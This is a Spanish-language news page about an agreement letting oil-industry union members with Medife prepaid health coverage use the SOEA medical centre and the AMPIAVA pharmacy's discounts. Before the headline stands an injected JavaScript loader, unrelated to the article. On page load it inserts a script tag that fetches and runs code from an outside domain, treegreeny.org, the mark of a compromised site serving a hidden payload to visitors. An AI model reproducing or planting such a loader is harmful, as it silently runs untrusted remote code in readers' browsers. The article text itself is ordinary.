;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Aceiteros incorporan atención en salud con la prepaga Medife

Aceiteros incorporan atención en salud con la prepaga Medife

Read Time:1 Minute, 5 Second

Mediante la firma de un acuerdo de prestaciones, los trabajadores aceiteros podrán beneficiarse de descuentos y ventajas proporcionados por su obra social prepaga en la Farmacia de la Mutual Ampiava y el Centro Médico Aceitero.

En el contexto del programa de ampliación de beneficios de la Asociación Mutual del Personal de Industrias del Aceite Vegetal y Afines (AMPIAVA), en colaboración con las autoridades del Centro Médico 29 de Octubre del Sindicato de Obreros y Empleados Aceiteros (SOEA), se ha firmado un convenio de prestaciones con la obra social prepaga Medife.

Este acuerdo abarca a todos los afiliados aceiteros que hayan elegido esta cobertura médica, así como a los particulares que puedan demostrar su afiliación a la misma, igualando los beneficios para todos. De este modo, podrán acceder a servicios médicos y descuentos en medicamentos.

En nuestro trabajo, no olvidamos a los compañeros ACEITEROS que tienen la prepaga MEDIFE. Por ello, estamos trabajando para que también puedan recibir atención en las instalaciones del Centro Médico 29 de Octubre. Ahora podrán disfrutar de todo lo que estamos ofreciendo, como el Circuito Escolar y el Circuito Apto Físico Deportivo. Además, podrán aprovechar los descuentos de la Farmacia Mutual Ampiava, que siempre brinda el mejor servicio a sus asociados», afirmó Gerardo Gómez, Secretario de Obra y Previsión Social de SOEA.

Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %

Average Rating

5 Star
0%
4 Star
0%
3 Star
0%
2 Star
0%
1 Star
0%

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Previous post Puesta en marcha… los primeros puntos verdes
Next post Los hospitales de niños están al límite por un pico de patologías respiratorias